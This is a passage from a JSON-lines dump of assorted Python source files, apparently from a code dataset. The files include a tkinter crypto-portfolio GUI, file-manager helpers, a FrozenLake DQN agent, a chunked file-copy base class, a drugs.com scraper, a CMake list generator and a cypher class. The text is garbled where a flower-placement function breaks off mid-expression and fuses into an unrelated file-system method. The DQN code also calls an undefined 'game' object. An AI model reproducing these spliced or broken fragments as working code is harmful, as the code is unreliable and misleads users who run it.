\n    # placed outside the per-coin loop: the totals row is drawn once\n    # print(\"total profit and loss for portfolio:\",total_pl)\n    total_pl_label=Label(pycrypto,text=\"${0:.2f}\".format(total_pl), bg=\"#F3F4F6\" ,fg=font_color(float(\"{0:.2f}\".format(total_pl))) ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\") # renamed from total_pl to stop shadowing the running total\n    total_pl_label.grid(row= coin_row,column=6 ,sticky=N+S+E+W)\n    total_plcv=Label(pycrypto,text=\"${0:.2f}\".format(total_current_value), bg=\"#F3F4F6\" ,fg=\"black\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\n    total_plcv.grid(row= coin_row,column=4 ,sticky=N+S+E+W)\n    \n    api=\"\"\n    \n    update=Button(pycrypto,text=\"Update\", bg=\"#142E54\" ,fg=\"white\" ,command=my_portfolio, font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\n    update.grid(row=coin_row+1,column=6 ,sticky=N+S+E+W)\n\n\nname=Label(pycrypto,text=\"Coin name\", bg=\"#142E54\" ,fg=\"white\",font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\nname.grid(row=0,column=0 ,sticky=N+S+E+W)\n\nprice=Label(pycrypto,text=\"Price\", bg=\"#142E54\" ,fg=\"white\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\nprice.grid(row=0,column=1 ,sticky=N+S+E+W)\n\nno_coins=Label(pycrypto,text=\"Coin Owned\", bg=\"#142E54\" ,fg=\"white\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\nno_coins.grid(row=0,column=2 ,sticky=N+S+E+W)\n\namount_paid=Label(pycrypto,text=\"Total Amount Paid\", bg=\"#142E54\" ,fg=\"white\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\namount_paid.grid(row=0,column=3 ,sticky=N+S+E+W)\n\nCurrent_val=Label(pycrypto,text=\"Current Value\", bg=\"#142E54\" ,fg=\"white\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\nCurrent_val.grid(row=0,column=4 ,sticky=N+S+E+W)\n\nPl_coin=Label(pycrypto,text=\"P/l Per Coin\", bg=\"#142E54\" ,fg=\"white\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\nPl_coin.grid(row=0,column=5 ,sticky=N+S+E+W)\n\ntotalpl=Label(pycrypto,text=\"Total p/l with coin\", bg=\"#142E54\" ,fg=\"white\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\ntotalpl.grid(row=0,column=6 ,sticky=N+S+E+W)\n\n\nmy_portfolio()\npycrypto.mainloop()\nprint(\"Program completed\")\n","sub_path":"main(bitcoin).py","file_name":"main(bitcoin).py","file_ext":"py","file_size_in_byte":6882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"570424267","text":"import os\nimport time\nimport json\nimport shutil\nimport psutil\nimport platform\n\nfrom PyQt5.QtCore import QFileInfo\nfrom PyQt5.QtWidgets import QFileIconProvider\n\n\nclass Dict(dict):\n def __init__(self, *args, **kwargs):\n super(Dict, self).__init__(*args, **kwargs)\n\n def __getattr__(self, item):\n return self.get(item)\n\n def __setattr__(self, key, value):\n self[key] = value\n\n\nclass ICO:\n FILE_TYPE_ICO = dict()\n FILE_TYPE_ICO[\"File Folder\"] = \"static/ico/Folder\"\n FILE_TYPE_ICO[\"Folder\"] = \"static/ico/Folder\"\n FILE_TYPE_ICO[\"Alias\"] = \"static/ico/Folder-\"\n FILE_TYPE_ICO[\"jpg File\"] = \"static/ico/jpg.png\"\n FILE_TYPE_ICO[\"png File\"] = \"static/ico/png.png\"\n FILE_TYPE_ICO[\"sys File\"] = \"static/ico/img.png\"\n FILE_TYPE_ICO[\"text File\"] = \"static/ico/txt.txt\"\n FILE_TYPE_ICO[\"File\"] = \"static/ico/txt.txt\"\n FILE_TYPE_ICO[\"zip File\"] = \"static/ico/zip.zip\"\n FILE_TYPE_ICO[\"7z File\"] = \"static/ico/7z.7z\"\n FILE_TYPE_ICO[\"rar File\"] = \"static/ico/rar.rar\"\n FILE_TYPE_ICO[\"gz File\"] = \"static/ico/gz.gz\"\n\n\ndef os_exists(abs_path):\n return os.path.exists(abs_path)\n\n\ndef file_size(abs_path):\n bytes_size = os.path.getsize(abs_path)\n k_size = bytes_size / 1024\n if k_size >= 1024:\n k_size /= 1024\n unit = \" MB\"\n if k_size >= 1024:\n k_size /= 1024\n unit = \"GB\"\n else:\n unit = \" KB\"\n return round(k_size, 2), unit, bytes_size\n\n\ndef bytes_to_speed(bytes_num):\n k_size = bytes_num / 1024\n if k_size >= 1024:\n k_size /= 1024\n unit = \" MB\"\n if k_size >= 1024:\n k_size /= 1024\n unit = \"GB\"\n else:\n unit = \" KB\"\n return str(round(k_size, 2)) + unit\n\n\ndef second_to_time(second):\n m, s = divmod(second, 60)\n h, m = divmod(m, 60)\n return \"%02d:%02d:%02d\" % (h, m, s)\n\n\ndef get_disk():\n sys_name = platform.system()\n disk = []\n if sys_name == \"Windows\":\n for i in psutil.disk_partitions():\n disk.append(i.device.replace(\"\\\\\", \"/\"))\n else:\n disk.append(\"/Users/lishaoxu/Desktop/\")\n return disk\n\n\ndef listdir(abs_path, include_conceal=True):\n provider = QFileIconProvider()\n try:\n list_dir = os.listdir(abs_path)\n except Exception as e:\n return []\n list_dir.sort()\n file_list = list()\n for file in list_dir:\n item_file = Dict()\n if file.startswith(\".\") and not include_conceal:\n continue\n abs_file_path = os.path.join(abs_path, file)\n item_file.name = file\n item_file.type = provider.type(QFileInfo(abs_file_path))\n try:\n mtime = os.path.getmtime(abs_file_path)\n item_file.last_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(int(mtime)))\n except Exception:\n item_file.last_time = \"\"\n try:\n if item_file.type in [\"File Folder\", \"Folder\"]:\n item_file.size = \"\"\n item_file.raw_size = 0\n else:\n size, unit, bytes_size = file_size(abs_file_path)\n item_file.size = str(size) + \" \" + unit\n except Exception:\n item_file.raw_size = 0\n item_file.size = \"\"\n file_list.append(item_file)\n Sort_Dict = {1: \"type\", 2: \"name\", 3: \"last_time\", 4: \"raw_size\"}\n file_list = sorted(file_list, key=lambda x: x[Sort_Dict[1]], reverse=False)\n return file_list\n\n\ndef mkdir(dir_path):\n if not dir_path:\n return False, \"不能为空\"\n if os.path.exists(dir_path):\n return False, f\"{dir_path} 已存在!\"\n try:\n os.mkdir(dir_path)\n return True, \"\"\n except Exception as e:\n return False, f\"异常 {str(e)}\"\n\n\ndef rename(old, new):\n if not old or not new:\n return False, \"不能为空\"\n if os.path.exists(new):\n return False, f\"{new} 已存在!\"\n 
\ndef rename(old, new):\n    if not old or not new:\n        return False, \"must not be empty\"\n    if os.path.exists(new):\n        return False, f\"{new} already exists!\"\n    else:\n        try:\n            os.renames(old, new)\n            return True, \"\"\n        except Exception as e:\n            return False, f\"Exception: {str(e)}\"\n\n\ndef remove(abs_path):\n    # delete a directory\n    if os.path.isdir(abs_path):\n        try:\n            shutil.rmtree(path=abs_path)\n            return True, \"\"\n        except Exception as e:\n            return False, f\"Delete failed: {str(e)}\"\n    # delete a file\n    else:\n        try:\n            os.remove(abs_path)\n            return True, \"\"\n        except Exception as e:\n            return False, f\"Delete failed: {str(e)}\"\n\ndef padding_data(data, need_len):\n    data += b\"*\" * need_len\n    return data\n\ndef jsondumps(data):\n    return json.dumps(data).encode()\n\ndef decode_dict(bytes_data):\n    try:\n        return json.loads(bytes_data.decode())\n    except Exception as e:\n        print(\"decode_dict error\", e, bytes_data)\n\n# encode data\ndef encode_dict(dict_data):\n    return json.dumps(dict_data).encode()\n\ndef list_dir_all(path, name):\n    create_root = False\n    abs_path = os.path.join(path, name)\n    if os.path.isdir(abs_path): # the item being sent is a directory\n        for home, dirs, files in os.walk(abs_path):\n            if not create_root:\n                create_root = True\n                yield 0, name\n            new_home = home.replace(path, '')\n            # collect all sub-directories\n            for dirname in dirs:\n                yield 0, os.path.join(new_home, dirname)\n\n            # collect all files\n            for filename in files:\n                yield 1, os.path.join(new_home, filename)\n    else:\n        yield 1, name\n# for i in list_dir_all(\"/Users/lishaoxu/Desktop/\", \"main\"):\n#     print(i)\n# print(mkdir(\"/Users/lishaoxu/Desktop/1\"))\n# print(rename(\"/Users/lishaoxu/Desktop/1\", \"/Users/lishaoxu/Desktop/3\"))\n# print(remove(\"/Users/lishaoxu/Desktop/123\"))\n# print(listdir(\"/Users/lishaoxu/Desktop/1\"))\n# print(get_disk())\n# print(os_exists(\"/Users/lishaoxu/Desktop/嵌入式.jpg\"))\n","sub_path":"client/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"568524932","text":"# AI for FrozenLake\n# Inspired in code from AI from A-Z\n\n# Importing the libraries\n\nimport numpy as np\nimport random\nimport os\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.autograd as autograd\nfrom torch.autograd import Variable\n\n#from fl_mapLoader import Game\n\n# Creating the architecture of the Neural Network\n\nclass Network(nn.Module):\n\n def __init__(self, input_size, nb_action):\n super(Network, self).__init__()\n self.input_size = input_size\n self.nb_action = nb_action\n self.fc1 = nn.Linear(input_size, 30)\n self.fc2 = nn.Linear(30, nb_action)\n\n def forward(self, state):\n x = F.relu(self.fc1(state))\n q_values = self.fc2(x)\n return q_values\n\n# Implementing Experience Replay\n\nclass ReplayMemory(object):\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.memory = []\n\n def push(self, event):\n self.memory.append(event)\n if len(self.memory) > self.capacity:\n del self.memory[0]\n\n def sample(self, batch_size):\n samples = zip(*random.sample(self.memory, batch_size))\n return map(lambda x: Variable(torch.cat(x, 0)), samples)\n\nclass Dqn():\n\n\t# Create and initialize all needed variables\n def __init__(self, input_size, nb_action, gamma):\n self.gamma = gamma\t# Gamma = Discount factor\n self.reward_window = []\n self.model = Network(input_size, nb_action) # Creates the object of the network class\n self.memory = ReplayMemory(100000) # Object of memory with capacity = 100000\n self.optimizer = optim.Adam(self.model.parameters(), lr = 0.01) # Creates object from torch.optim as optimizer with the parameters from the model and learning rate = 0.001\n self.last_state = torch.Tensor(input_size).unsqueeze(0) # Creates a batch to input in the NN with the variables of the state and a fake dimension in position 0 corresponding to the batch\n self.last_action = 0 # {0,1,2,3}\n self.last_reward = 0 # [-1,0,+1]\n\n # This probably needs to be changed so it selects an action from the possible pool\n def select_action(self, state):\n ## Seleccionar aqui tambien si accion aleatoria o utilizar red neuronal\n probs = F.softmax(self.model(Variable(state, volatile = True))*100) # T=100 (temperature parameter)\n action = probs.multinomial(num_samples=1) # Returns a random action from the possible actions based on a multinomial distribution\n return action.data[0,0] # The action is contained in index [0,0] of the data\n\n\t# This method implements Deep Q-Learning process represented in Handbook - Chapter 5.3\n def learn(self, batch_state, batch_next_state, batch_reward, batch_action): # (dqn object, current state, next state, reward, performed action) ## MARKOV DECISION PROCESS\n outputs = self.model(batch_state).gather(1, batch_action.unsqueeze(1)).squeeze(1) #gather returns the best action to play for each of the input states\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t #batch_action.unsqueeze(1) to make it consistent with batch_state\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t #.squeeze(1) kills the fake dimension since we don't need the batch anymore outside the neural network\n next_outputs = self.model(batch_next_state).detach().max(1)[0]\n target = self.gamma*next_outputs + batch_reward\t# Target Q-Value.\n td_loss = F.smooth_l1_loss(outputs, target) # Inputs predictions and targets to loss function to compare results\n self.optimizer.zero_grad() # Reinitializes optimizer to a gradient = 0\n td_loss.backward() # Backpropagation\n self.optimizer.step() # 
\n    def update(self, state):\n        new_state = torch.Tensor(state).float().unsqueeze(0) # Converts the observed state into a float Torch tensor with a batch dimension\n        self.memory.push((self.last_state, new_state, torch.LongTensor([int(self.last_action)]), torch.Tensor([self.last_reward]))) # Stores the transition event: last state, new state, last action played and last reward\n        action = self.select_action(new_state)\n        if len(self.memory.memory) > 100: # Check whether the memory holds enough samples to learn from, then pick 100 of them\n            batch_state, batch_next_state, batch_action, batch_reward = self.memory.sample(100) # Builds parameter batches from randomly selected past transitions\n            self.learn(batch_state, batch_next_state, batch_reward, batch_action)\n\n        # NOTE: `game` is assumed to be supplied by the environment wrapper (see the commented fl_mapLoader import above)\n        self.last_action, self.last_reward, self.done, _ = game.perform_action(action)\n        #self.last_action = action\n        #self.last_state = new_state\n        #self.last_reward = reward\n        self.reward_window.append(self.last_reward)\n        if len(self.reward_window) > 1000:\n            del self.reward_window[0]\n        return action\n\n    def score(self): # Computes the mean of the rewards in the reward window\n        return sum(self.reward_window)/(len(self.reward_window)+1.)\n","sub_path":"scripts/OpenAI-Gym/FrozenLake/.ipynb_checkpoints/ai_frozen-checkpoint.py","file_name":"ai_frozen-checkpoint.py","file_ext":"py","file_size_in_byte":5060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"541872043","text":"import math\n# place 1 in 0,1 sequence s.t. 1's are not adjacent\n# check if place n 1's is possible\n# => place 1's in continue 0's\n# => 3 cases, suppose we have k 0's: \n# 1,one end:0...1, just like case3, with k-1 0's\n# 2,two end:1...0...1, just like case3, with k-2 0's\n# 3,no end:0...0\n# max 1's can be placed- 3:ceil[k/2]\n# def can_place_flower(bit_map, n):\n\t# read all the 0's segments\n\t# if sum(above_segment) == len(bit_map), use case3, else\n\t# calculate case2 segments\n\t# check if 1st is 0, last is 0 to determine if we need case2\n\t# max_1s = 0\n\t# zero_segs = []\n\t# zero_seg = 0\n\t# all_zeros = True\n\t# for index,bit in enumerate(bit_map):\n\t# \tif bit==1:\n\t# \t\tall_zeros = False\n\t# \tif bit==1 or index==len(bit_map)-1:\n\t# \t\tif zero_seg>0:\n\t# \t\t\tzero_segs.add(zero_seg)\n\t# \t\tzero_seg = 0\n\t# \telse:\n\t# \t\tzero_seg = zero_seg + 1\n\n\t# if all_zeros:\n\t# \treturn math.ceil(n/2)>=n\n\t# if len(zero_segs)==0:\n\t# \treturn n==0\n\n\t# for case2_seg in zero_segs[1:-1]:\n\t# \tmax_1s = max_1s + math.ceil( (case2_seg-2)/2 )\n\n\t# if bit_map[0]==0:\n\t# \tmax_1s = max_1s + math.ceil( (zero_segs[0]-1)/2 )\n\t# else:\n\t# \tmax_1s = max_1s + math.ceil( (zero_segs[0]-2)/2 )\n\n\t# if bit_map[-1]==0:\n\t# \tmax_1s = max_1s + math.ceil( (zero_segs[-1]-1)/2 )\n\t# else:\n\t# \tmax_1s = max_1s + math.ceil( (zero_segs[-1]-2)/2 )\n\n\t# return max_1s>=n\n\n\n# another approach, read 2 bits at one time 10,01,00,11 4 cases\n# then modify bit map (add constraints) when scanning\n# 00=>01? not sure\n# another approach, when dicide to change 0 to 1, look left & right bit\ndef can_place_flower(bit_map, n):\n\tmax_counter = 0\n\tfor ind,bit in enumerate(bit_map):\n\t\tleft_can_flip = ind==0 or bit_map[ind-1]==0\n\t\tright_can_flip = ind==len(bit_map)-1 or bit_map[ind+1]==0\n\t\tcan_flip = left_can_flip and right_can_flip and bit==0\n\t\tif can_flip:\n\t\t\tbit_map[ind] = 1\n\t\t\tmax_counter = max_counter + 1\n\treturn n %s\" % (src.abspath, dst.abspath))\n\n # TODO: There must be a better way to do this, but type(src) == type(dst) does not work\n if src.__class__.__name__ == dst.__class__.__name__:\n self.local_mv_file(src, dst)\n else:\n self.cp_file(src, dst, dstFs)\n self.delete_file_dir(src)\n\n @RetryAndCatch(Errors.FsException, 10, 10, doubling_backoff)\n def cp_chunk(self, src, dst, dstFs, srcOffset, dstOffset, lastChunk, dstWriteMode):\n size = Constants.DEFAULT_BIG_FILE_THRESHOLD - srcOffset % Constants.DEFAULT_BIG_FILE_THRESHOLD\n if lastChunk:\n size = src.size - srcOffset\n\n progressFormatString = \"({0:>13,}/{1:>13,}) bytes\"\n sizeWritten = 0\n \n with FileOpen(self, src, True, \"rb\", srcOffset, size) as srcCopy:\n with FileOpen(dstFs, dst, False, dstWriteMode, dstOffset, dstOffset) as dstCopy:\n for batch in srcCopy:\n if self.verbose and is_normal_stdout():\n sizeWritten += len(batch)\n progressString = progressFormatString.format(sizeWritten, size)\n sys.stdout.write(progressString)\n sys.stdout.write(\"\\b\" * len(progressString))\n sys.stdout.flush()\n dstFs.append_data(dstCopy, batch)\n\n @RetryAndCatch(Errors.FsException, 5, 10)\n def make_fd_retriable(self, path, isSrc, dstDirMustExist):\n return self.make_fd(path, isSrc, dstDirMustExist)\n \n @RetryAndCatch(Errors.FsException, 5, 10, doubling_backoff)\n def concat_chunk_files(self, fs, fileName, chunkList):\n if chunkList:\n fs.touch_file(fileName)\n fs.try_concat_files(fileName, chunkList)\n\n def remote_cp_file(self, src, dst, dstFs):\n dstChunkList = 
    def remote_cp_file(self, src, dst, dstFs):\n        dstChunkList = None\n\n        # Step 1: Perform a copy\n        progressString = \"- Progress: \"\n        self.logger.info(\"REMOTE COPY ({0}): {1} -> {2}\".format(src.size, src.abspath, dst.abspath))\n        if src.size <= Constants.DEFAULT_BIG_FILE_THRESHOLD:\n            if self.verbose and is_normal_stdout():\n                sys.stdout.write(progressString)\n                sys.stdout.flush()\n            if dst.exists:\n                dstFs.delete_file_dir(dst)\n            dstFs.touch_file(dst)\n\n            self.cp_chunk(src, dst, dstFs, 0, 0, True, \"wb\")\n        else:\n            chunk = 0\n            offset = 0\n            chunkSize = Constants.DEFAULT_BIG_FILE_THRESHOLD\n            numChunks = (src.size // chunkSize) + 1 # integer division; float '/' made the lastChunk test below always false in Python 3\n            dstChunkList = list()\n            while offset < src.size:\n                dstChunk = dstFs.make_fd_retriable(\n                    dst.abspath + \".__chunk__\" + str(chunk),\n                    isSrc=False,\n                    dstDirMustExist=True)\n                \n                dstChunkList.append(dstChunk)\n                self.logger.info(\"BIG COPY: chunk={0}, dst={1}\".format(chunk, dstChunk.abspath))\n\n                if dstChunk.exists:\n                    dstFs.delete_file_dir(dstChunk)\n                dstFs.touch_file(dstChunk)\n                \n                if dstChunk.size == Constants.DEFAULT_BIG_FILE_THRESHOLD \\\n                    and src.modificationTime <= dstChunk.modificationTime:\n                    if self.verbose:\n                        print(\"%s -> %s: skipped\" % (src.abspath, dstChunk.abspath))\n                elif dstChunk.size > Constants.DEFAULT_BIG_FILE_THRESHOLD:\n                    errMsg = \"a chunk: {0} has its size bigger than max size, you need to remove it before the next retry\".format(dstChunk.abspath)\n                    self.logger.error(errMsg)\n                    raise Errors.FsException(errMsg)\n                else:\n                    if self.verbose:\n                        print(\"%s -> %s\" % (src.abspath, dstChunk.abspath))\n                        if is_normal_stdout():\n                            progressFormatString = \"Chunk ({0}/{1}) - \"\n                            progressString += progressFormatString.format(chunk + 1, numChunks)\n                            sys.stdout.write(progressString)\n                            sys.stdout.flush()\n                    self.cp_chunk(src, dstChunk, dstFs, offset+dstChunk.size, dstChunk.size, chunk == numChunks - 1, \"ab\")\n                    if self.verbose and is_normal_stdout():\n                        sys.stdout.write(\"\\r\")\n                        sys.stdout.flush()\n                chunk += 1\n                offset = chunk * chunkSize\n        \n        # Step 2: concat all chunk files into the final file\n        self.concat_chunk_files(dstFs, dst, dstChunkList)\n
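\n    # (added) cp_file semantics: when dst is an existing directory the source is\n    # copied into it under its own name; an existing destination file is skipped\n    # unless force is set.\n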
    def cp_file(self, src, dst, dstFs, force):\n        self.logger.info(\"COPY: from({0})={1} to({2})={3}\".format(src.fs.__class__.__name__,\n                                                                 src.abspath,\n                                                                 dst.fs.__class__.__name__,\n                                                                 dst.abspath))\n        if dst.is_directory:\n            newPath = self.path_join(dst.abspath, src.name)\n            newDst = dstFs.make_fd(path=newPath, isSrc=False, dstDirMustExist=True)\n            self.logger.info(\"COPY TARGET: change from {0} to {1}\".format(dst.abspath, newDst.abspath))\n            dst = newDst\n\n        if dst.exists and not force:\n            if self.verbose:\n                print(\"Destination %s already exists, copy will not be performed. Add -f to force copy\" % (dst.abspath)) # the format string was missing its %s placeholder\n            return\n        else:\n            if self.verbose:\n                print(\"%s -> %s\" % (src.abspath, dst.abspath))\n\n        startTime = time.time()\n\n        # TODO: There must be a better way to do this, but type(src) == type(dst) does not work\n        if src.__class__.__name__ == dst.__class__.__name__:\n            # This is purely a performance optimization, the code below will\n            # perform a deep copy which is just as good\n            self.logger.info(\"LOCAL COPY: {0} -> {1}\".format(src.abspath, dst.abspath))\n            self.local_cp_file(src, dst)\n        else:\n            self.remote_cp_file(src, dst, dstFs)\n\n        endTime = time.time()\n\n        dst = dstFs.make_fd_retriable(dst.abspath, False, True)\n        if src.size != dst.size:\n            raise ValueError(\"Size mismatch, %s size %d, %s size %d\" % (src.abspath, src.size, dst.abspath, dst.size))\n\n        self.bytesCopied += src.size\n        self.copyTime += endTime - startTime\n\n    def compute_hash(self, fd):\n        chunk = 0\n        offset = 0\n        hashList = list()\n        while offset < fd.size:\n            hasher = hashlib.sha1()\n            size = min(Constants.DEFAULT_BIG_FILE_THRESHOLD, fd.size - offset)\n            with FileOpen(self, fd, True, \"rb\", offset, size) as srcCopy:\n                for batch in srcCopy:\n                    hasher.update(batch)\n\n            currHash = str(hasher.hexdigest())\n            self.logger.debug(\"HASH for {0}, {1}-{2}: {3}\".format(fd.abspath, offset, offset + size, currHash))\n            hashList.append(currHash)\n            chunk += 1\n            offset = chunk*Constants.DEFAULT_BIG_FILE_THRESHOLD\n\n        hasher = hashlib.sha1()\n\n        for subHash in hashList:\n            hasher.update(subHash.encode(\"utf-8\"))\n\n        print(\"Hash for file {0} is {1}\".format(fd.abspath, str(hasher.hexdigest())))\n\n    def walk(self, fd):\n        # Not able to use os.walk in local case as it is too slow for large directories\n        workList = list()\n        workList.append(fd)\n        while len(workList) > 0:\n            currDir = workList.pop(0)\n            fileList = list()\n            dirList = list()\n            try:\n                for item in self.list_dir(currDir):\n                    if item.is_directory:\n                        workList.append(item)\n                        dirList.append(item)\n                    elif item.is_file or item.is_symlink:\n                        fileList.append(item)\n            except Errors.Unauthorized:\n                print(\"Insufficient privileges to access the path: %s\" % currDir.abspath)\n\n            yield currDir, dirList, fileList\n\n    def fast_walk(self, fd):\n        # Not able to use os.walk in local case as it is too slow for large directories\n        workList = list()\n        workList.append(fd)\n        currDir = None\n        while len(workList) > 0:\n            prevDir = currDir\n            currDir = workList.pop(0)\n            try:\n                for item in self.list_dir(currDir):\n                    if item.is_directory:\n                        workList.append(item)\n                    elif item.is_file or item.is_symlink:\n                        yield prevDir != currDir, currDir, item\n            except Errors.Unauthorized:\n                print(\"Insufficient privileges to access the path: %s\" % currDir.abspath)\n\n    def read_chunk(self, srcFile, offset, size, chunkSize=Constants.DEFAULT_COPY_CHUNK_SIZE):\n        sizeLeftToRead = size\n        while sizeLeftToRead != 0:\n            startTime = time.time()\n            data = self.read_data(srcFile, offset, chunkSize)\n            elapsedTime = time.time() - startTime\n            sizeRead = len(data)\n            self.logger.debug(\"Read: {0:,} bytes in {1} secs, copy rate {2:,} bytes/sec\".format(\n                sizeRead, elapsedTime, sizeRead/elapsedTime))\n            sizeLeftToRead -= sizeRead\n            assert sizeLeftToRead >= 0\n            offset += sizeRead\n            yield data\n\n    def make_fd(self, path, isSrc, dstDirMustExist):\n        raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n    def exists_file_dir(self, fd):\n        raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n    def delete_file_dir(self, fd, recursive, 
force):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def list_dir(self, fd):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def make_dir(self, path):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def open_file(self, fd, rwMode):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def close_file(self, fd):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def touch_file(self, fd):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def truncate_file(self, fd, size):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def try_concat_files(self, fd, chunkFdList):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def concat_files(self, fd, chunkFdList):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def read_data(self, fd, offset, size):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def append_data(self, fd, data):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def local_mv_file(self, src, dst):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def local_cp_file(self, src, dst):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n","sub_path":"pai-fs/fsimpl/BaseFs.py","file_name":"BaseFs.py","file_ext":"py","file_size_in_byte":17071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"496134006","text":"from bs4 import BeautifulSoup\nimport urllib.request\nfrom collections import defaultdict\n\nurl='https://www.drugs.com/drug_information.html'\n\nfrom urllib.request import Request, urlopen\n\nreq = Request(url, headers={'User-Agent': 'Mozilla/5.0'})\nurl_f= urlopen(req).read()\n\nsoup=BeautifulSoup(url_f,'html.parser')\n\nlinks={}\ndrugs={}\ndrugs=defaultdict(dict)\n\nlist1= soup.find_all('ul',{'class':'ddc-paging'})\n#print(list1, end=\"\\n \")\n\nfor i in list1:\n per_drugs=i.find_all('a')\n#print(per_drugs, end=\" \\n\")\nfor link in per_drugs:\n links[str(link.string)]=str(link.get('href'))\n#print(links, end=\"\\n\")\n\n#for x,y in links.items():\n # print(const+y,x)\n\nconst='https://www.drugs.com'\n\ndef func(website,char):\n #print(char)\n req_1 = Request(website, headers={'User-Agent': 'Mozilla/5.0'})\n url_f_1= urlopen(req_1).read()\n soup_1=BeautifulSoup(url_f_1,'html.parser')\n\n list_1= soup_1.find_all('ul',{'class':'ddc-list-column-2'})\n \n for j in list_1:\n per_drugs_1=j.find_all('a')\n #print(per_drugs_1,end=\"\\n\")\n m=1\n for drug in per_drugs_1:\n \n drugs[str(char)][m]=str(drug.string)\n m=m+1\n \n \n\nfor x,y in links.items():\n func(const+y,x)\n\n#print(drugs,end=\"\\n\")\n\n\nq=input(\"enter letter \")\n\nprint(drugs[q])\n","sub_path":"scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"32956933","text":"import os\nimport re\nengine_name = 'OurLibrary'\nengine_dir= engine_name + '/'\n\nextensions=['.cpp', '.hpp', '.h']\nsrc_files = []\nfor root, dirs, files in os.walk(engine_dir):\n for file in files:\n for ext in extensions:\n if file.endswith(ext):\n path = os.path.join(root, file)\n path = path.replace(engine_dir, '')\n path = path.replace('\\\\', '/')\n src_files.append(path)\n print(os.path.join(root, file), '=>', path)\n\n\nammend_data = 'add_library(\\n\\t' + engine_name + ' SHARED \\n\\t'\nfor file in src_files:\n ammend_data = ammend_data + file + '\\n\\t'\n\nprint(ammend_data)\n\ncmake_file = open(engine_dir + 'CMakeLists.txt')\ndata = cmake_file.read();\n#data = data.replace('add_library([^)]*)', 'add_library(sup)')\ndata = re.sub('add_library([^)]*)', ammend_data, data, count = 1, flags = re.DOTALL)\n\ncmake_file = open(engine_dir + 'CMakeLists.txt', 'w')\ncmake_file.write(data)\nprint(data)","sub_path":"populate_cmake_src_deps.py","file_name":"populate_cmake_src_deps.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"456626067","text":"from random import randint\nimport string\n\nALPHABET = string.ascii_lowercase\n\nclass Cypher:\n \n def __init__(self, map = (lambda a: a)):\n if isinstance(map, dict):\n self._cyphermap = map\n self._decyphermap = dict()\n for key in map:\n self._decyphermap[map[key]] = key\n elif callable(map):\n self._cyphermap = dict()\n self._decyphermap = dict()\n for ltr in ALPHABET:\n self._cyphermap[ltr] = map(ltr)\n self._decyphermap[map(ltr)] = ltr\n else:\n assert False, \"map in Cypher initializer should be a function or a dictionary\"\n\n def copy(self):\n cyphermap_copy = self._cyphermap.copy()\n to_return = Cypher(cyphermap_copy)\n return to_return\n\n #infer_cypher chooses a random word from words and forces the cypher to decrypt encrypted_word to that word\n @staticmethod\n def infer_cypher(encrypted_word, words):\n assert isinstance(encrypted_word, str), \"infer_cypher() takes a string.\"\n\n def cypher_match(encrypted_word, words):\n\n def get_pattern(word):\n assert isinstance(word, str), \"get_pattern() takes a string.\"\n pattern = {}\n for i in range(len(word)):\n if (word.find(word[i]) in pattern.keys()):\n pattern[word.find(word[i])].append(i)\n else:\n pattern[i] = [i]\n\n return pattern\n\n assert isinstance(encrypted_word, str), \"cypher_match() takes a string.\"\n assert type(words) == type(list()), \"words should be a list of strings.\"\n to_return = []\n pattern = get_pattern(encrypted_word)\n for word in words:\n assert isinstance(word, str), \"words should be a list of strings.\"\n if get_pattern(word) == pattern:\n to_return.append(word)\n\n return to_return\n \n matches = []\n while 